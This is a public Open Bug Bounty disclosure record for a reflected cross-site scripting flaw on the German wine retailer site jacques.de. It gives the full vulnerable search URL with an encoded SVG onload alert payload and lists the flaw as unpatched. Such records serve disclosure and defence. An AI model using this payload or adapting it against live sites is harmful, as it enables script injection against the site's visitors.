jacques.de XSS vulnerability

2015-12-09T20:28:00
ID OBB:115075
Type openbugbounty
Reporter krankoPwnz
Modified 2015-12-09T20:30:00

Description

Vulnerable URL:
https://www.jacques.de/weinsuche/?queryFromSuggest=&filterDataType;=product&productsPerPage;=12&keywords;=asd%22%3E%3Csvg%20onload%3Dalert%28%2fXSSPOSED%2f%29%20a
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 240644
Google Pagerank| 3
VIP website status:| No
Check jacques.de SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 December, 2015 20:28 GMT
Vulnerability existence verified and confirmed| 9 December, 2015 20:30 GMT